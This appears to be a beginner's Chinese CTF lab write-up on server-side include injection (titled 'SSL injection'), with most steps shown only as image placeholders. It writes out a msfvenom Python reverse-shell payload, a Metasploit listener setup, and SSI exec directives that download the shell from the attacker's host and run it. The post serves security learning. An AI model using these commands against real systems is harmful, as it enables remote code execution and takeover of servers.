小白学习CTF第九天-web安全(SSL注入)

ssl注入

在这里插入图片描述

ssl注入介绍

在这里插入图片描述
简单了解一下ssl注入攻击:

信息探测

这个与之前的都一样:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
接下来要根据扫描的道德信息,进行漏洞利用

漏洞利用

在这里插入图片描述
可以尝试打开一些比较敏感的位置:
在这里插入图片描述
像这个就是禁止访问的,我们就可以忽略了,但是有的时候我们也要查看网页源代码看看是否有关键信息。
在这里插入图片描述
打开这个可以看我不让我们访问的目录,尝试访问,下载对应的文件,看看有没有关键信息。
在这里插入图片描述
可以把这两个文件都下载了,之后查看有没有信息,我下载完之后看了一下,没有关键信息,我就没有截图了。
再尝试打开别的网址,看看有没有可以利用的漏洞:
在这里插入图片描述
这个是有可能注入的点。
在这里插入图片描述
第一眼看到这个不知道有什么用,但是发现到下面的就知道这个是干什么的了。
在这里插入图片描述
在这里插入图片描述
可以利用之前的发现的命令格式,进行注入攻击。
利用之前发现的命令,尝试一下:
在这里插入图片描述
在这里插入图片描述
发现我们输入的命令他给我们注释掉了,怎么办?
我们可以使用大小写进行替换,之后加上!
在这里插入图片描述
在这里插入图片描述
简单的替换大小写,还是不行,我们加上!
在这里插入图片描述
这回发现可以了:
在这里插入图片描述
成功利用了漏洞!!!

上传webshell

在这里插入图片描述
首先我们要制作一个webshell,这次我们尝试使用python制作一个,这次不用php了。

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw > /root/桌面/shell_ssl.py

在这里插入图片描述
之后我们启动监听:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.17.128

在这里插入图片描述
在这里插入图片描述
run一下:
在这里插入图片描述
下载对应的脚本,执行获取反弹shell,在此之前,移动文件 :

mv shell.py /var/www/html/

在这里插入图片描述
之后还要开启对应的apache2服务;

service apache2 start
service apache2 status //检测是否开启

在这里插入图片描述
利用之前发现的漏洞,下载利用webshell,反弹对应的权限:

<!--#EXEC cmd="wget http://192.168.17.128/shell_ssl.py"-->
<!--#EXEC cmd="chmod 777 shell_ssl.py"-->
<!--#EXEC cmd="python shell_ssl.py"--> 

首先要下载webshell
在这里插入图片描述
下载成功!
在这里插入图片描述
之后对于下载的文件赋予权限:
在这里插入图片描述
赋予权限成功!
在这里插入图片描述
执行webshell
在这里插入图片描述
停顿中,应该是反弹成功了!
在这里插入图片描述
反弹成功!
在这里插入图片描述

获取权限之后执行操作

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以了!!!

总结

在这里插入图片描述
靶场本次没有设置flag,可以了!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值